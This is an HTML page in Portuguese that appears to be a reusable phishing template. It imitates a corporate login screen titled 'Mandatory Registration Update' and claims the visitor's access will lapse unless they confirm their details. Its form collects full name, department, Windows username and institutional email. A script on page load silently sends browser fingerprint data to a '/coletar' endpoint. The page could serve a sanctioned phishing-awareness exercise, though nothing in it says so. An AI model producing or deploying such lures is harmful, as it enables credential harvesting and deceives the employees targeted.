<!DOCTYPE html>
<html lang="pt-BR">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Entrar na conta</title>
  <style>
    body {
      background-color: #f3f3f3;
      font-family: "Segoe UI", sans-serif;
      display: flex;
      align-items: center;
      justify-content: center;
      height: 100vh;
      margin: 0;
    }
    .container {
      background: white;
      padding: 120px;
      width: 320px;
      min-height: 500px;
      box-shadow: 0 0 20px rgba(0,0,0,0.1);
    }
    h2 {
      font-weight: 600;
      margin-bottom: 40px;
      font-size: 20px;
      text-align: center;
    }
    p.subtitulo {
    font-size: 14px;
    color: #666;
    margin-bottom: 30px;
    text-align: center;
    }
    input {
      width: 100%;
      padding: 12px;
      margin: 12px 0;
      border: 1px solid #ccc;
      border-radius: 4px;
      font-size: 15px;
    }
    button {
      background: #0078d4;
      color: white;
      border: none;
      padding: 10px;
      width: 100%;
      cursor: pointer;
      font-size: 15px;
      border-radius: 4px;
    }
    .container img {
      display: block;
      margin: 0 auto 20px auto; /* centraliza e dá margem inferior */
      max-width: 200px;
      margin-top: 10px; /* opcional: sobe um pouco */
    }
    .rodape {
     margin-top: 30px;
     font-size: 12px;
     color: #999;
     text-align: center;
    }
  </style>
</head>
<body>
  <div class="container">
    <div class="logo">
      <img src="" alt="Colocar img aq da sua empresa" width="100">
    </div>
    <h2>Atualização de Cadastro Obrigatória</h2>
    <p style="margin-top: -10px; margin-bottom: 20px; color: #666; font-size: 14px;">
        Solicitamos a confirmação dos dados para manter seu acesso ativo.
      </p>
    <form method="POST" action="/">
        <input type="text" name="nome" placeholder="Nome completo" required />
        <input type="text" name="setor" placeholder="Setor" required />
        <input type="text" name="usuario" placeholder="Usuário do Windows" required />
        <input type="email" name="email" placeholder="Email institucional" required />
        <button type="submit">Confirmar</button>
        <p class="rodape">  © 2025 ... LTDA. Todos os direitos reservados.</p>
      </form>
  </div>
  <script>
    fetch('/coletar', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify({
            userAgent: navigator.userAgent,
            language: navigator.language,
            platform: navigator.platform
        })
    });
    </script>
</body>
</html>